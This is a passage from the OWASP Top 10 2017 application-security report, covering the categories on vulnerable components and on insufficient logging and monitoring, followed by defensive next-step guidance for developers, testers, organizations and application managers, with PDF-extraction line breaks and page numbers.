• If software developers do not test the compatibility of
updated,
upgraded, or patched libraries.
70. • If you do not secure the components' configurations
(see A6:2017-Security Misconfiguration).
References
OWASP
• OWASP Application Security Verification Standard: V1
Architecture, design and threat modelling
• OWASP Dependency Check (for Java and .NET libraries)
• OWASP Testing Guide: Map Application Architecture (OTG-
INFO-010)
• OWASP Virtual Patching Best Practices
External
• The Unfortunate Reality of Insecure Libraries
• MITRE Common Vulnerabilities and Exposures (CVE) search
• National Vulnerability Database (NVD)
• Retire.js for detecting known vulnerable JavaScript libraries
• Node Libraries Security Advisories
• Ruby Libraries Security Advisory Database and Tools
How to Prevent
There should be a patch management process in place to:
• Remove unused dependencies, unnecessary features,
components, files, and documentation.
• Continuously inventory the versions of both client-side and
71. server-side components (e.g. frameworks, libraries) and their
dependencies using tools like versions, DependencyCheck,
retire.js, etc. Continuously monitor sources like CVE and NVD
for vulnerabilities in the components. Use software composition
analysis tools to automate the process. Subscribe to email
alerts for security vulnerabilities related to components you
use.
• Only obtain components from official sources over secure
links.
Prefer signed packages to reduce the chance of including a
modified, malicious component.
• Monitor for libraries and components that are unmaintained or
do not create security patches for older versions. If patching is
not possible, consider deploying a virtual patch to monitor,
detect, or protect against the discovered issue.
Every organization must ensure that there is an ongoing plan for
monitoring, triaging, and applying updates or configuration
changes for the lifetime of the application or portfolio.
A9
:2017
Using Components
with Known Vulnerabilities
Exploitability: 2 Prevalence: 3 Detectability: 2 Technical: 2
While it is easy to find already-written
exploits for many known
vulnerabilities, other vulnerabilities
require concentrated effort to develop
72. a custom exploit.
Prevalence of this issue is very widespread.
Component-heavy development patterns can lead to
development teams not even understanding which
components they use in their application or API,
much less keeping them up to date.
Some scanners such as retire.js help in detection,
but determining exploitability requires additional
effort.
While some known vulnerabilities
lead to only minor impacts, some of
the largest breaches to date have
relied on exploiting known
vulnerabilities in components.
Depending on the assets you are
protecting, perhaps this risk should
be at the top of the list.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-
5638
https://en.wikipedia.org/wiki/Internet_of_things
https://www.shodan.io/report/89bnfUyJ
https://en.wikipedia.org/wiki/Heartbleed
https://www.owasp.org/index.php/ASVS_V1_Architecture
https://www.owasp.org/index.php/OWASP_Dependency_Check
https://www.owasp.org/index.php/Map_Application_Architectur
e_(OTG-INFO-010)
https://www.owasp.org/index.php/Virtual_Patching_Best_Practi
ces
https://www.aspectsecurity.com/research-presentations/the-
unfortunate-reality-of-insecure-libraries
https://www.cvedetails.com/version-search.php
https://nvd.nist.gov/
74. issue.
Scenario #2: An attacker uses scans for users using a common
password. They can take over all accounts using this password.
For all other users, this scan leaves only one false login behind.
After some days, this may be repeated with a different
password.
Scenario #3: A major US retailer reportedly had an internal
malware analysis sandbox analyzing attachments. The sandbox
software had detected potentially unwanted software, but no one
responded to this detection. The sandbox had been producing
warnings for some time before the breach was detected due to
fraudulent card transactions by an external bank.
Is the Application Vulnerable?
Insufficient logging, detection, monitoring and active response
occurs any time:
• Auditable events, such as logins, failed logins, and high-value
transactions are not logged.
• Warnings and errors generate no, inadequate, or unclear log
messages.
• Logs of applications and APIs are not monitored for
suspicious
activity.
• Logs are only stored locally.
• Appropriate alerting thresholds and response escalation
processes are not in place or effective.
• Penetration testing and scans by DAST tools (such as OWASP
ZAP) do not trigger alerts.
75. • The application is unable to detect, escalate, or alert for active
attacks in real time or near real time.
You are vulnerable to information leakage if you make logging
and alerting events visible to a user or an attacker (see
A3:2017-
Sensitive Information Exposure).
References
OWASP
• OWASP Proactive Controls: Implement Logging and Intrusion
Detection
• OWASP Application Security Verification Standard: V8
Logging
and Monitoring
• OWASP Testing Guide: Testing for Detailed Error Code
• OWASP Cheat Sheet: Logging
External
• CWE-223: Omission of Security-relevant Information
• CWE-778: Insufficient Logging
How to Prevent
As per the risk of the data stored or processed by the
application:
• Ensure all login, access control failures, and server-side input
validation failures can be logged with sufficient user context to
identify suspicious or malicious accounts, and held for
sufficient
76. time to allow delayed forensic analysis.
• Ensure that logs are generated in a format that can be easily
consumed by a centralized log management solutions.
• Ensure high-value transactions have an audit trail with
integrity
controls to prevent tampering or deletion, such as append-only
database tables or similar.
• Establish effective monitoring and alerting such that
suspicious
activities are detected and responded to in a timely fashion.
• Establish or adopt an incident response and recovery plan,
such as NIST 800-61 rev 2 or later.
There are commercial and open source application protection
frameworks such as OWASP AppSensor, web application
firewalls such as ModSecurity with the OWASP ModSecurity
Core Rule Set, and log correlation software with custom
dashboards and alerting.
A10
:2017
Insufficient
Logging & Monitoring
Exploitability: 2 Prevalence: 3 Detectability: 1 Technical: 2
Exploitation of insufficient logging and
monitoring is the bedrock of nearly
every major incident.
Attackers rely on the lack of
77. monitoring and timely response to
achieve their goals without being
detected.
This issue is included in the Top 10 based on an
industry survey.
One strategy for determining if you have sufficient
monitoring is to examine the logs following
penetration testing. The testers’ actions should be
recorded sufficiently to understand what damages
they may have inflicted.
Most successful attacks start with
vulnerability probing. Allowing such
probes to continue can raise the
likelihood of successful exploit to
nearly 100%.
In 2016, identifying a breach took an
average of 191 days – plenty of time
for damage to be inflicted.
https://www.owasp.org/index.php/Category:Vulnerability_Scann
ing_Tools
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_
Project
https://www.owasp.org/index.php/OWASP_Proactive_Controls#
8:_Implement_Logging_and_Intrusion_Detection
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project#tab=Home
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project#tab=Home
https://www.owasp.org/index.php/Logging_Cheat_Sheet
https://cwe.mitre.org/data/definitions/223.html
https://cwe.mitre.org/data/definitions/778.html
79. their applications and APIs.
There are numerous additional OWASP resources available for
your use. Please visit the OWASP Projects page, which lists all
the
Flagship, Labs, and Incubator projects in the OWASP project
inventory. Most OWASP resources are available on our wiki,
and
many OWASP documents can be ordered in hardcopy or as
eBooks.
To produce a secure web application, you must define what
secure means for that application.
OWASP recommends you use the OWASP Application Security
Verification Standard (ASVS) as a
guide for setting the security requirements for your
application(s). If you’re outsourcing, consider
the OWASP Secure Software Contract Annex. Note: The annex
is for US contract law, so please
consult qualified legal advice before using the sample annex.
Rather than retrofitting security into your applications and
APIs, it is far more cost effective to
design the security in from the start. OWASP recommends the
OWASP Prevention Cheat Sheets
as a good starting point for guidance on how to design security
in from the beginning.
Application
Security
Architecture
80. Building strong and usable security controls is difficult. Using a
set of standard security controls
radically simplifies the development of secure applications and
APIs. The OWASP Proactive
Controls is a good starting point for developers, and many
modern frameworks now come with
standard and effective security controls for authorization,
validation, CSRF prevention, etc.
Standard
Security
Controls
To improve the process your organization follows when
building applications and APIs, OWASP
recommends the OWASP Software Assurance Maturity Model
(SAMM). This model helps
organizations formulate and implement a strategy for software
security that is tailored to the
specific risks facing their organization.
The OWASP Education Project provides training materials to
help educate developers on web
application security. For hands-on learning about
vulnerabilities, try OWASP WebGoat,
WebGoat.NET, OWASP NodeJS Goat, OWASP Juice Shop
Project or the OWASP Broken Web
Applications Project. To stay current, come to an OWASP
AppSec Conference, OWASP
Conference Training, or local OWASP Chapter meetings.
Application
Security
Education
81. +D What’s Next for Developers
Application
Security
Requirements
Secure
Development
Lifecycle
https://www.owasp.org/index.php/Projects
https://www.owasp.org/
http://stores.lulu.com/owasp
https://www.owasp.org/index.php/ASVS
https://www.owasp.org/index.php/OWASP_Secure_Software_C
ontract_Annex
https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series
https://www.owasp.org/index.php/OWASP_Proactive_Controls
https://www.owasp.org/index.php/OWASP_SAMM_Project
https://www.owasp.org/index.php/Category:OWASP_Education
_Project
https://www.owasp.org/index.php/WebGoat
https://www.owasp.org/index.php/Category:OWASP_WebGoat.
NET
https://www.owasp.org/index.php/OWASP_Node_js_Goat_Proje
ct
https://www.owasp.org/index.php/OWASP_Juice_Shop_Project
https://www.owasp.org/index.php/OWASP_Broken_Web_Applic
ations_Project
https://www.owasp.org/index.php/Category:OWASP_AppSec_C
onference
https://www.owasp.org/index.php/Category:OWASP_Chapter
82. 18
Establish Continuous Application Security Testing
Building code securely is important. But it’s critical to verify
that the security you intended to build is actually present,
correctly
implemented, and used everywhere it is supposed to be. The
goal of application security testing is to provide this evidence.
The work is difficult and complex, and modern high-speed
development processes like Agile and DevOps have put extreme
pressure on traditional approaches and tools. So we strongly
encourage you to put some thought into how you are going to
focus on what’s important across your entire application
portfolio, and do it cost-effectively.
Modern risks move quickly, so the days of scanning or
penetration testing an application for vulnerabilities once every
year or
so are long gone. Modern software development requires
continuous application security testing across the entire
software
development lifecycle. Look to enhance existing development
pipelines with security automation that doesn’t slow
development. Whatever approach you choose, consider the
annual cost to test, triage, remediate, retest, and redeploy a
single application, multiplied by the size of your application
83. portfolio.
+T What’s Next for Security Testers
Before you start testing, be sure you understand what’s
important to spend time on. Priorities
come from the threat model, so if you don’t have one, you need
to create one before testing.
Consider using OWASP ASVS and the OWASP Testing Guide
as an input and don’t rely on tool
vendors to decide what’s important for your business.
Your approach to application security testing must be highly
compatible with the people,
processes, and tools you use in your software development
lifecycle (SDLC). Attempts to force
extra steps, gates, and reviews are likely to cause friction, get
bypassed, and struggle to scale.
Look for natural opportunities to gather security information
and feed it back into your process.
Choose the simplest, fastest, most accurate technique to verify
each requirement. The OWASP
Security Knowledge Framework and OWASP Application
Security Verification Standard can be
great sources of functional and nonfunctional security
requirements in your unit and integration
testing. Be sure to consider the human resources required to
deal with false positives from the
use of automated tooling, as well as the serious dangers of false
negatives.
Testing
Strategies
You don’t have to start out testing everything. Focus on what’s
84. important and expand your
verification program over time. That means expanding the set of
security defenses and risks that
are being automatically verified as well as expanding the set of
applications and APIs being
covered. The goal is to achieve a state where the essential
security of all your applications and
APIs is verified continuously.
Achieving
Coverage
and
Accuracy
No matter how good you are at testing, it won’t make any
difference unless you communicate it
effectively. Build trust by showing you understand how the
application works. Describe clearly
how it can be abused without “lingo” and include an attack
scenario to make it real. Make a
realistic estimation of how hard the vulnerability is to discover
and exploit, and how bad that
would be. Finally, deliver findings in the tools development
teams are already using, not PDF
files.
Understand
the Threat
Model
Understand
Your
86. requires many different parts of an organization to work
together
efficiently, including security and audit, software development,
business, and executive management. Security should be
visible and measurable, so that all the different players can see
and understand the organization’s application security
posture. Focus on the activities and outcomes that actually help
improve enterprise security by eliminating or reducing risk.
OWASP SAMM and the OWASP Application Security Guide for
CISOs is the source of most of the key activities in this list.
+O What’s Next for Organizations
• Document all applications and associated data assets. Larger
organizations should consider
implementing a Configuration Management Database (CMDB)
for this purpose.
• Establish an application security program and drive adoption.
• Conduct a capability gap analysis comparing your
organization to your peers to define key
improvement areas and an execution plan.
• Gain management approval and establish an application
security awareness campaign for the
entire IT organization.
Get Started
• Identify the protection needs of your application portfolio
from a business perspective. This
87. should be driven in part by privacy laws and other regulations
relevant to the data asset being
protected.
• Establish a common risk rating model with a consistent set of
likelihood and impact factors
reflective of your organization's tolerance for risk.
• Accordingly measure and prioritize all your applications and
APIs. Add the results to your CMDB.
• Establish assurance guidelines to properly define coverage and
level of rigor required.
Risk Based
Portfolio
Approach
• Establish a set of focused policies and standards that provide
an application security baseline for
all development teams to adhere to.
• Define a common set of reusable security controls that
complement these policies and standards
and provide design and development guidance on their use.
• Establish an application security training curriculum that is
required and targeted to different
development roles and topics.
Enable with
a Strong
Foundation
• Define and integrate secure implementation and verification
88. activities into existing development
and operational processes. Activities include threat modeling,
secure design and design review,
secure coding and code review, penetration testing, and
remediation.
• Provide subject matter experts and support services for
development and project teams to be
successful.
Integrate
Security
into
Existing
Processes
• Manage with metrics. Drive improvement and funding
decisions based on the metrics and
analysis data captured. Metrics include adherence to security
practices and activities,
vulnerabilities introduced, vulnerabilities mitigated, application
coverage, defect density by type
and instance counts, etc.
• Analyze data from the implementation and verification
activities to look for root cause and
vulnerability patterns to drive strategic and systemic
improvements across the enterprise.
Learn from mistakes and offer positive incentives to promote
improvements.
Provide
Management
90. 20
Manage the Full Application Lifecycle
Applications belong to the most complex systems humans
regularly create and maintain. IT management for an application
should be performed by IT specialists who are responsible for
the overall IT lifecycle of an application. We suggest
establishing the role of application manager as technical
counterpart to the application owner. The application manager
is in
charge of the whole application lifecycle from the IT
perspective, from collecting the requirements until the process
of retiring
systems, which is often overlooked.
+A What’s Next for Application Managers
• Collect and negotiate the business requirements for an
application with the business, including the
protection requirements with regard to confidentiality,
authenticity, integrity and availability of all data
assets, and the expected business logic.
• Compile the technical requirements including functional and
nonfunctional security requirements.
• Plan and negotiate the budget that covers all aspects of design,
build, testing and operation, including
security activities.
Requirements
91. and Resource
Management
• Negotiate the requirements with internal or external
developers, including guidelines and security
requirements with respect to your security program, e.g. SDLC,
best practices.
• Rate the fulfillment of all technical requirements, including a
planning and design phase.
• Negotiate all technical requirements, including design,
security, and service level agreements (SLA).
• Adopt templates and checklists, such as OWASP Secure
Software Contract Annex.
Note: The annex is for US contract law, so please consult
qualified legal advice before using the
sample annex.
Request for
Proposals
(RFP) and
Contracting
• Negotiate planning and design with the developers and
internal shareholders, e.g. security specialists.
• Define the security architecture, controls, and
countermeasures appropriate to the protection needs
and the expected threat level. This should be supported by
security specialists.
• Ensure that the application owner accepts remaining risks or
provides additional resources.
92. • In each sprint, ensure security stories are created that include
constraints added for non-functional
requirements.
Planning and
Design
• Automate the secure deployment of the application, interfaces
and all required components,
including needed authorizations.
• Test the technical functions and integration with the IT
architecture and coordinate business tests.
• Create "use" and "abuse" test cases from technical and
business perspectives.
• Manage security tests according to internal processes, the
protection needs, and the assumed threat
level by the application.
• Put the application in operation and migrate from previously
used applications if needed.
• Finalize all documentation, including the change management
data base (CMDB) and security
architecture.
Deployment,
Testing, and
Rollout
• Operations must include guidelines for the security
management of the application (e.g. patch
93. management).
• Raise the security awareness of users and manage conflicts
about usability vs. security.
• Plan and manage changes, e.g. migrate to new versions of the
application or other components like
OS, middleware, and libraries.
• Update all documentation, including in the CMDB and the
security architecture, controls, and
countermeasures, including any runbooks or project
documentation.
Operations
and Change
Management
• Any required data should be archived. All other data should be
securely wiped.
• Securely retire the application, including deleting unused
accounts and roles and permissions.
• Set your application’s state to retired in the CMDB.
Retiring
Systems
https://www.owasp.org/index.php/OWASP_Secure_Software_C
ontract_Annex
21
It’s About the Risks that Weaknesses Represent
94. The Risk Rating methodology for the Top 10 is based on the
OWASP Risk Rating Methodology. For each Top 10 category,
we estimated the typical risk that each weakness introduces to a
typical web application by looking at common likelihood
factors and impact factors for each common weakness. We then
ordered the Top 10 according to those weaknesses that
typically introduce the most significant risk to an application.
These factors get updated with each new Top 10 release as
things change and evolve.
The OWASP Risk Rating Methodology defines numerous
factors to help calculate the risk of an identified vulnerability.
However, the Top 10 must talk about generalities, rather than
specific vulnerabilities in real applications and APIs.
Consequently, we can never be as precise as application owners
or managers when calculating risks for their application(s).
You are best equipped to judge the importance of your
applications and data, what your threats are, and how your
system
has been built and is being operated.
Our methodology includes three likelihood factors for each
weakness (prevalence, detectability, and ease of exploit) and
one
impact factor (technical impact). The risk scales for each factor
range from 1-Low to 3-High with terminology specific for each